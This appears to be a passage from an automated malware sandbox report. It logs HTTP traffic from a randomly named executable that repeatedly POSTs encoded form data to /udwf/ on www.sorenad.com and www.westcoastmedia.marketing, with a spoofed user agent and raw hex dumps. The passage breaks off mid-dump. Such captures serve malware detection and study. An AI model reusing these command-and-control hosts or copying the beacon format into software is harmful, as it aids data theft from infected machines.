                                                                                                                            50192.168.2.1049766136.243.218.1880C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:30:51.932936907 CET336OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.sorenad.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.sorenad.com
                                                                                                                            Referer: http://www.sorenad.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 54 59 4e 35 6a 49 49 57 75 49 50 38 63 4a 67 46 4b 2b 7a 31 39 2f 2b 66 6e 31 42 6c 6a 50 6c 47 51 52 67 54 5a 32 39 66 4c 51 61 6b 6a 5a 63 5a 65 47 54 31 41 6d 59 4e 4d 49 59 6a 6b 54 52 66 77 79 75 54 68 77 75 59 66 64 6e 64 4b 66 59 48 78 30 75 4b 74 2b 79 46 70 54 57 44 33 6d 70 6a 59 5a 56 68 70 66 45 6a 66 6d 39 4c 70 66 50 4f 53 67 64 6d 2b 6c 67 76 6f 67 70 62 7a 34 73 53 34 43 6c 78 7a 4a 46 6e 71 54 35 31 52 42 75 47 4f 34 39 79 39 7a 65 52 52 64 4e 5a 57 61 58 68 50 45 59 43 66 70 66 53 79 42 76 2b 35 68 4c 53 4d 66 68 48 4b 41 64 4a 51 37 74 69 7a 68 34 70 61 66 51 6d 71 78 65 31 32 53 74 76 52 53 43 39 55 51 6c 55 4e 6a 5a 6f 42 67 2b 66 39 32 53 63 42 76 52 31 47 39 6c 65 56 4d 31 66 56 72 37 71 66 57 51 77 41 67 50 45 57 6b 42 61 59 73 68 31 2f 42 4e 73 48 54 46 37 39 48 35 2b 53 75 76 75 70 68 33 36 30 6f 67 50 6b 37 39 45 68 34 4d 4f 71 39 58 68 35 47 72 32 50 73 46 2f 64 33 4f 6c 53 50 68 75 4e 37 31 38 65 76 65 36 73 68 38 48 4a 73 70 56 30 53 50 53 7a 4e 47 74 2b 6c 6d 78 38 6e 2b 7a 35 35 73 5a 6d 46 4c 44 78 52 58 7a 38 6e 4f 65 52 35 46 65 49 68 77 4f 6a 67 36 46 37 52 41 6f 34 4d 67 6d 4e 2b 36 32 53 32 6c 42 71 45 66 47 45 69 63 44 79 6b 77 41 4b 35 2b 63 45 6d 6c 4f 73 6f 5a 77 74 36 6a 67 52 39 4a 6c 4a 58 42 68 4e 67 48 6d 30 34 6f 57 74 59 6a 42 66 78 68 55 75 46 57 37 47 35 77 62 47 51 36 35 4b 46 2f 74 73 77 74 52 4e 36 45 30 6a 76 54 38 31 4b 49 47 72 43 75 62 48 4b 46 79 33 41 72 6b 6d 4f 38 71 51 33 49 6d 36 58 43 68 5a 6e 4c 34 51 72 2f 64 54 44 52 71 79 73 2f 74 35 4d 6f 53 70 6d 64 54 35 39 6d 4d 46 6e 68 66 61 6b 2b 45 6b 45 61 57 42 42 66 74 63 6c 4d 53 47 4b 6d 72 68 62 53 71 7a 4a 57 74 45 34 48 45 5a 32 2f 52 53 74 36 4d 72 4a 46 2b 50 46 31 65 50 61 2f 31 58 4e 38 32 67 72 32 66 68 79 53 50 72 31 4d 31 66 2b 42 39 4e 6c 66 42 32 42 73 5a 45 53 76 56 4a 41 63 55 7a 30 64 4f 71 47 70 43 49 54 68 48 52 49 37 31 2f 69 4e 48 71 41 6b 62 75 57 48 4a 33 62 55 50 6e 6c 38 55 56 58 32 62 41 61 6f 49 37 65 31 75 58 78 39 6f 52 75 39 71 75 64 6d 74 30 54 51 52 45 41 66 34 4f 58 37 55 52 64 39 56 52 7a 43 33 70 38 58 62 59 58 57 54 62 6d 62 4c 69 65 53 67 33 71 35 47 49 54 4b 63 54 45 55 73 6f 65 2f 67 41 7a 38 6f 58 56 63 6c 49 74 59 62 6f 4c 7a 2b 6f 49 6a 6c 78 2f 7a 5a 30 30 4e 69 7a 72 67 43 6c 2f 65 36 2f 63 43 69 47 79 2f 39 30 48 4e 53 76 50 41 52 47 67 37 50 47 67 78 5a 52 67 57 57 6f 2b 77 39 46 5a 31 68 6f 48 55 33 37 2b 4f 38 7a 72 6b 68 51 6b 6e 32 45 69 78 32 42 37 56 59 34 35 42 52 57 55 71 55 34 61 4c 38 37 4a 69 5a 41 68 33 79 48 6f 33 30 39 54 48 6a 55 4a 6e 61 46 37 68 37 69 4f 35 61 31 52 33 43 47 4d 38 36 30 44 76 74 4b 2f 58 63 49 50 42 43 78 58 34 57 58 62 42 71 38 56 54 43 77 4b 4d 54 44 46 58 42 63 57 31 69 6f 37 44 63 65 52 50 67 4a 4e 59 78 50 46 63 4e 62 6d 76 43 76 53 54 30 61 75 70 78 38 6b 62 39 55 30 6c 30 56 6c 7a 59 74 5a 44 39 30 79 74 55 6f 39 64 6d 5a 33 50 45 51 5a 51 77 4b 69 32 39 32 66 6a 66 5a 76 62 4b 78 76 4a 33 38 59 51 64 70 76 37 45 58 72 62 43 58 37 69 53 36 32 50 6c 2f 6c 35 67 55 66 36 45 55 64 62 52 55 52 79 52 64 6f 65 4f 77 31 49 37 38 4c 55 2f 30 6e 50 6e 68 6a 51 5a 51 59 62 50 53 39 50 4f 30 36 69 56 44 50 64 47 4c 68 44 45 2b 6c 4b 2f 2b 4f 75 51 38 59 47 63 4b 30 53 69 37 47 4a 55 57 6f 64 46 49 49 52 57 34 77 41 58 64 4b 59 56 54 7a 39 47 55 4a 4b 6f 6e 57 34 6b 73 6b 76 32 67 79 70 6c 6c 35 77 6f 7a 72 50 74 59 6f 77 37 31 48 58 6f 41 62 65 6e 4a 79 62 50 35 56 45 4b 6d 4c 4b 38 4a 54 78 72 53 72 7a 34 37 59 32 6e 52 57 4e 6c 63 55 59 42 4b 38 62 73 77 45 59 2b 75 57 78 62 68 79 57 54 4f 43 72 67 72 62 51 59 69 69 75 34 72 4d 31 55 50 57 4b 65 7a 4e 38 6a 49 63 53 4a 66 71 33 36
                                                                                                                            Data Ascii: G0Yxd2Q=TYN5jIIWuIP8cJgFK+z19/+fn1BljPlGQRgTZ29fLQakjZcZeGT1AmYNMIYjkTRfwyuThwuYfdndKfYHx0uKt+yFpTWD3mpjYZVhpfEjfm9LpfPOSgdm+lgvogpbz4sS4ClxzJFnqT51RBuGO49y9zeRRdNZWaXhPEYCfpfSyBv+5hLSMfhHKAdJQ7tizh4pafQmqxe12StvRSC9UQlUNjZoBg+f92ScBvR1G9leVM1fVr7qfWQwAgPEWkBaYsh1/BNsHTF79H5+Suvuph360ogPk79Eh4MOq9Xh5Gr2PsF/d3OlSPhuN718eve6sh8HJspV0SPSzNGt+lmx8n+z55sZmFLDxRXz8nOeR5FeIhwOjg6F7RAo4MgmN+62S2lBqEfGEicDykwAK5+cEmlOsoZwt6jgR9JlJXBhNgHm04oWtYjBfxhUuFW7G5wbGQ65KF/tswtRN6E0jvT81KIGrCubHKFy3ArkmO8qQ3Im6XChZnL4Qr/dTDRqys/t5MoSpmdT59mMFnhfak+EkEaWBBftclMSGKmrhbSqzJWtE4HEZ2/RSt6MrJF+PF1ePa/1XN82gr2fhySPr1M1f+B9NlfB2BsZESvVJAcUz0dOqGpCIThHRI71/iNHqAkbuWHJ3bUPnl8UVX2bAaoI7e1uXx9oRu9qudmt0TQREAf4OX7URd9VRzC3p8XbYXWTbmbLieSg3q5GITKcTEUsoe/gAz8oXVclItYboLz+oIjlx/zZ00NizrgCl/e6/cCiGy/90HNSvPARGg7PGgxZRgWWo+w9FZ1hoHU37+O8zrkhQkn2Eix2B7VY45BRWUqU4aL87JiZAh3yHo309THjUJnaF7h7iO5a1R3CGM860DvtK/XcIPBCxX4WXbBq8VTCwKMTDFXBcW1io7DceRPgJNYxPFcNbmvCvST0aupx8kb9U0l0VlzYtZD90ytUo9dmZ3PEQZQwKi292fjfZvbKxvJ38YQdpv7EXrbCX7iS62Pl/l5gUf6EUdbRURyRdoeOw1I78LU/0nPnhjQZQYbPS9PO06iVDPdGLhDE+lK/+OuQ8YGcK0Si7GJUWodFIIRW4wAXdKYVTz9GUJKonW4kskv2gypll5wozrPtYow71HXoAbenJybP5VEKmLK8JTxrSrz47Y2nRWNlcUYBK8bswEY+uWxbhyWTOCrgrbQYiiu4rM1UPWKezN8jIcSJfq36
                                                                                                                            Nov 10, 2023 09:30:52.239691019 CET337INHTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 708
                                                                                                                            date: Fri, 10 Nov 2023 08:30:52 GMT
                                                                                                                            vary: User-Agent
                                                                                                                            access-control-allow-origin: *
                                                                                                                            access-control-allow-methods: GET,POST,OPTIONS,DELETE
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            51192.168.2.1049767136.243.218.1880C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:30:55.933465958 CET338OUTGET /udwf/?G0Yxd2Q=ealZg/ITvpLJU7YFE/TF+8q+uExFybxcdjgzbBdGHgaAn5MnYWXQDBclabNRkiFFmFTfmTH8N/zDLP0J5EOM1vyD30GW5j90MQ==&pp=dZa4 HTTP/1.1
                                                                                                                            Host: www.sorenad.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:30:56.240942001 CET339INHTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 708
                                                                                                                            date: Fri, 10 Nov 2023 08:30:56 GMT
                                                                                                                            vary: User-Agent
                                                                                                                            access-control-allow-origin: *
                                                                                                                            access-control-allow-methods: GET,POST,OPTIONS,DELETE
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            52192.168.2.104976891.195.240.1980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:31:01.942513943 CET340OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.westcoastmedia.marketing
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.westcoastmedia.marketing
                                                                                                                            Referer: http://www.westcoastmedia.marketing/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 61 42 45 4f 37 43 49 35 38 45 39 4c 4d 44 74 79 4d 4d 56 65 30 33 4d 30 45 6b 6d 75 55 74 57 46 35 45 61 63 75 7a 68 58 44 51 45 78 63 69 4b 43 30 36 58 78 42 59 38 56 41 59 32 6c 79 70 74 6e 5a 45 51 76 2f 6b 37 63 64 4e 70 46 34 45 6a 75 73 5a 6b 47 73 30 7a 78 79 37 69 59 43 72 52 69 37 47 47 4f 38 4e 65 57 37 4b 6c 39 2f 51 43 41 63 38 79 43 4d 78 6f 79 5a 6b 52 6a 4a 78 59 32 38 58 71 4b 52 7a 39 31 68 4d 58 33 6c 4c 45 33 53 54 6c 73 32 38 4a 46 50 4d 66 39 38 58 57 76 53 37 70 69 49 56 48 7a 4c 6a 43 73 79 50 66 65 37 51 3d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=aBEO7CI58E9LMDtyMMVe03M0EkmuUtWF5EacuzhXDQExciKC06XxBY8VAY2lyptnZEQv/k7cdNpF4EjusZkGs0zxy7iYCrRi7GGO8NeW7Kl9/QCAc8yCMxoyZkRjJxY28XqKRz91hMX3lLE3STls28JFPMf98XWvS7piIVHzLjCsyPfe7Q==
                                                                                                                            Nov 10, 2023 09:31:02.248675108 CET341INHTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:31:02 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            53192.168.2.104976991.195.240.1980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:31:04.777517080 CET342OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.westcoastmedia.marketing
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.westcoastmedia.marketing
                                                                                                                            Referer: http://www.westcoastmedia.marketing/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 61 42 45 4f 37 43 49 35 38 45 39 4c 4e 6a 64 79 4f 76 74 65 7a 58 4d 37 4f 45 6d 75 42 64 57 42 35 45 57 63 75 78 4e 48 44 6a 77 78 64 48 75 43 7a 4c 58 78 43 59 38 56 59 49 32 6b 2f 4a 74 67 5a 45 63 6e 2f 68 62 63 64 4c 46 46 34 45 54 75 72 75 51 42 74 6b 7a 7a 2f 62 69 57 4d 4c 52 69 37 47 47 4f 38 4f 69 73 37 4b 64 39 2b 6a 71 41 64 65 61 42 50 78 6f 78 65 6b 52 6a 61 68 59 79 38 58 71 34 52 33 39 54 68 4f 76 33 6c 4c 55 33 56 43 6c 76 6a 4d 4a 44 52 38 65 34 7a 56 44 35 52 62 4e 75 4e 47 44 46 53 57 76 43 7a 61 7a 4e 38 69 51 72 50 5a 76 43 6a 54 6b 4e 71 4f 63 44 59 50 39 55 58 6a 63 3d
                                                                                                                            Data Ascii: G0Yxd2Q=aBEO7CI58E9LNjdyOvtezXM7OEmuBdWB5EWcuxNHDjwxdHuCzLXxCY8VYI2k/JtgZEcn/hbcdLFF4ETuruQBtkzz/biWMLRi7GGO8Ois7Kd9+jqAdeaBPxoxekRjahYy8Xq4R39ThOv3lLU3VClvjMJDR8e4zVD5RbNuNGDFSWvCzazN8iQrPZvCjTkNqOcDYP9UXjc=
                                                                                                                            Nov 10, 2023 09:31:05.085036039 CET342INHTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:31:04 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            54192.168.2.104977091.195.240.1980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:31:07.603514910 CET344OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.westcoastmedia.marketing
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.westcoastmedia.marketing
                                                                                                                            Referer: http://www.westcoastmedia.marketing/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 61 42 45 4f 37 43 49 35 38 45 39 4c 4e 6a 64 79 4f 76 74 65 7a 58 4d 37 4f 45 6d 75 42 64 57 42 35 45 57 63 75 78 4e 48 44 69 49 78 64 30 57 43 30 59 2f 78 44 59 38 56 51 6f 32 68 2f 4a 74 78 5a 45 45 6a 2f 68 66 4d 64 49 78 46 35 6e 62 75 75 61 4d 42 6b 6b 7a 7a 32 37 69 58 43 72 51 6d 37 47 33 47 38 4e 4b 73 37 4b 64 39 2b 6d 75 41 4c 38 79 42 44 52 6f 79 5a 6b 52 6e 4a 78 59 61 38 58 79 53 52 33 70 6c 68 36 62 33 6b 72 6b 33 54 30 5a 76 2f 63 4a 42 51 38 65 65 7a 56 65 6e 52 62 67 64 4e 48 48 6a 53 57 58 43 77 63 65 41 75 43 6b 76 4c 59 66 34 73 42 77 55 68 5a 55 4b 66 36 52 67 46 30 61 37 45 4b 65 71 66 68 39 69 33 56 70 61 56 39 78 79 75 6c 79 47 4a 70 77 52 78 44 4f 41 68 31 62 76 6a 5a 7a 51 61 58 6a 51 71 48 46 5a 4a 30 35 42 68 2b 4c 71 39 73 55 47 50 65 7a 45 58 67 38 65 6d 48 61 73 41 72 42 49 47 74 55 45 53 34 66 5a 4d 6a 54 42 4a 37 5a 6f 63 4c 4b 37 50 72 42 4a 35 61 70 34 62 36 6d 30 75 4a 56 44 50 52 56 54 71 45 4b 6f 2f 62 38 31 4b 77 51 72 72 45 48 69 77 53 77 45 6f 75 6b 72 79 67 65 4a 4e 51 6b 50 77 64 6c 6c 5a 64 30 52 54 45 45 50 72 6f 30 70 58 4d 55 2f 67 48 52 44 4a 30 37 63 47 73 76 4a 57 4a 38 77 4a 55 50 37 32 47 39 66 72 31 70 52 2f 33 72 2b 32 35 4a 44 6f 67 62 42 50 58 61 6c 57 55 39 44 32 37 67 6b 47 44 54 6d 71 47 4e 51 7a 73 73 6e 65 32 48 73 2f 72 52 4b 51 38 6d 6b 55 49 78 5a 75 6e 65 68 70 2b 74 69 33 38 37 49 42 6a 45 76 54 32 57 6d 6c 4e 6d 74 33 71 6f 57 64 33 65 77 45 78 65 56 56 38 